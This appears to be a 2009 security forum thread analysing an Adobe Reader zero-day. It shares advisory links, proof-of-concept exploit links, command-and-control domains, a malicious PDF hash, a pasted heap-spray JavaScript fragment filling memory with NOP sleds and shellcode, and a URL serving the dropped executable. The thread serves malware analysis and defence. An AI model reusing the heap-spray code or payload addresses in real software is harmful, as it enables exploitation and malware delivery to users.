Adobe/Acrobat 0-day

[SysAdMini]

http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090219

[Serg]

hxxp://dump.vicp.cc/l/a.bin - url from the same 0day i suppose...

[Serg]

cnc on religion.xicp.net and religion.8866.org? Japan? WTF

[SysAdMini]

http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

[SysAdMini]

Homebrew patch for Adobe AcroReader 9
http://vrt-sourcefire.blogspot.com/2009/02/homebrew-patch-for-adobe-acroreader-9.html

[DiFor]

and saw somebody working version of this? very interesting to see

[SysAdMini]

Targeted PDFs Used as Exploits
https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/vulnerabilities_exploits/article-id/188

[WIEx]

milw0rm POC-s:
http://milw0rm.com/exploits/8090
http://milw0rm.com/exploits/8099

I think that soon will attack as well as POC in public

[alta]

Thanks WIEx for the lynks 

[DiFor]

it's DoS exploit

[Serg]

but it works under 9

[DiFor]

it's only crash apllication)

[Serg]

the new payload for me... pdf md5: 8AE719CDD29F0E6AF4D4DD321CC40355

Code: [Select]

...
                while (pointers.length<=0x100000/2)pointers+=pointers
                pointers=pointers.substring(0,0x100000/2-32/2-4/2-pointers1.length-2/2
                while (nop.length<=0x100000/2)nop+=nop
                nop=nop.substring(0,0x100000/2-32/2-4/2-jmp.length-2/2)
                var x=new Array()
                for (i=0 ; i<150 ; i++)
                {
                        x[i]=nop+shellcode
                }
                for ( ; i<201 ; i++)
                {
                        x[i]=pointers+pointers1
                }
                return x
...

load from

Code: [Select]

http://202.67.215.110/caonimabi.exe
IP is very know from several malware, ex: http://www.threatexpert.com/report.aspx?md5=39376f28624e3de9e23d6fd57235b42e

[Serg]

it's only crash apllication)

u do not know the secret  

[WIEx]

it's only crash apllication)

Yes, I said that this POC (proof of concept) exploit